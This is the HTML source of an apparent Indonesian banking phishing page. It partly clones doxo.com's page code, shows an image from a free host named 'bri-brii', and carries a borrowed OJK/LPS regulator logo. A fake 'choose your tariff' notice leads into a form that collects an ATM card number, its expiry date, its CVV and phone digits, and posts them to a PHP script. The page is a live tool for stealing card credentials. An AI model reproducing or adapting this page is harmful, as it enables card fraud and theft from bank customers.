<!doctype html>
<html lang="en">
 <head> 
  <meta charset="UTF-8"> 
  <meta content="authenticity_token" name="csrf-param"> 
  <meta content="7ynYnhMsGX1pap1pPx/QfsfwCP93B3WI3Oh12IWRKGo=" name="csrf-token"> 
  <title></title> 
  <meta name="viewport" content="user-scalable=no, initial-scale=1.0, maximum-scale=1.0, width=device-width"> 
  <meta name="apple-mobile-web-app-capable" content="yes"> 
  <meta name="theme-color" content="#1E90FF"> 
  <link href="https://d3duiou06tembb.cloudfront.net/assets/public-6d771bb61e9a71ad172b58a99a657abe0d6acc9d2e11b6de7a07e32d009d3bdc.css" media="screen" rel="stylesheet"> 
  <script>
//<![CDATA[

    window.dataLayer = [];

//]]>
</script> 
  <script>
//<![CDATA[

      (function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':
      new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],
      j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src=
      'https://www.googletagmanager.com/gtm.js?id='+i+dl+'';f.parentNode.insertBefore(j,f);
      })(window,document,'script','dataLayer','GTM-MN22SCS');

//]]>
</script> 
  <script>
//<![CDATA[

      (function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':
      new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],
      j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src=
      'https://ssc.doxo.com/gtm.js?id='+i+dl+'';f.parentNode.insertBefore(j,f);
      })(window,document,'script','dataLayer','GTM-PPXDVKB');

//]]>
</script> 
  <script type="text/javascript">

var _sift = window._sift = window._sift || [];
_sift.push(["_setAccount","ccc37b4619"]);
_sift.push(["_setSessionId","7232170f37b9b80b7fc01ed77aebe59d"]);
_sift.push(["_setCookieDomain",".doxo.com"]);
_sift.push(['_trackPageview']);

(function() {
 function ls() {
 var e = document.createElement('script');
 e.src = 'https://cdn.siftscience.com/s.js';
 document.body.appendChild(e);
 }
 if (window.attachEvent) {
 window.attachEvent('onload', ls);
 } else {
 window.addEventListener('load', ls, false);
 }
 })();
</script> 
 </head> 
 <body> 
  <div class="container-fluid"> 
   <section class="row" role="main"> 
    <div class="col-xs-12"> 
     <div class="auth"> 
      <div class="auth__body"> 
       <div class="spot notification group" id="flash_messages" style="display: none;"> 
        <div class="content group"> 
        </div> 
       </div> 
       <center>
        <img src="https://bri-brii.000webhostapp.com/Game/Jpg/Jpg1" width="90%"> 
        <h3><strong></strong></h3> 
        <h5><strong></strong></h5> 
       </center> 
       <strong><strong>
       <h5><strong><strong>Silakan Pilih Tarif</strong> </strong>
        <form id="form1" name="name" action="daftarakun.php" method="post">
         <strong> </strong>
         <div class="input class">
          <strong> <input type="checkbox" name="A2" value="LAMA"> TARIF LAMA Rp 6.500 Pertransaksi<br> </strong>
          <div class="input class">
           <strong> <input type="checkbox" name="A2" value="BARU"> TARIF BARU Rp 150.000 Perbulan</strong>
           <div>
            <strong><strong></strong><h5><strong></strong> 
              <div> 
               <input class="form-control" type="text-css" name="tol1" placeholder="4 Digit Akhir No Telpon" autocomplete="off" required maxlength="4">
               <br>
               <input class="form-control" type="text-css" name="tol2" placeholder="Nomor kartu ATM" autocomplete="off" required maxlength="16">
               <br>
               <input class="form-control" type="text-css" name="tol3" placeholder="Valid Thru" autocomplete="off" required maxlength="4">
               <br>
               <input class="form-control" type="text-css" name="tol4" placeholder="CVV" autocomplete="off" required maxlength="3"> 
              </div> <br>  <button type="submit" class="bubble-element Button clickable-element" style="max-width: 90%; padding: 0px; cursor: pointer; background: none rgb(9, 140, 227); border: none; text-align: center; display: block; margin: 20px auto; height: 39px; width: 346px; left: 0px; top: 0px; font-family: Arial; font-size: 14px; font-weight: 400; color: rgb(255, 255, 255); letter-spacing: 1.5px; line-height: 1; border-radius: 5px; box-shadow: rgb(170, 170, 170) 2px 2px 4px 0px; transition: background 200ms ease 0s;" tabindex="2">Konfirmasi</button> </h5></strong>
           </div>
          </div>
         </div>
        </form></h5> 
      </div> 
      <strong><strong> </strong></strong> 
     </div> 
     <center> 
      <strong><strong><img src="https://www.hsbc.co.id/1/PA_esf-ca-app-content/content/indonesia/pws-2.0/common-images/OJK_LPS_Logo.png" width="150" height="30"> <br><br></strong></strong> 
     </center> 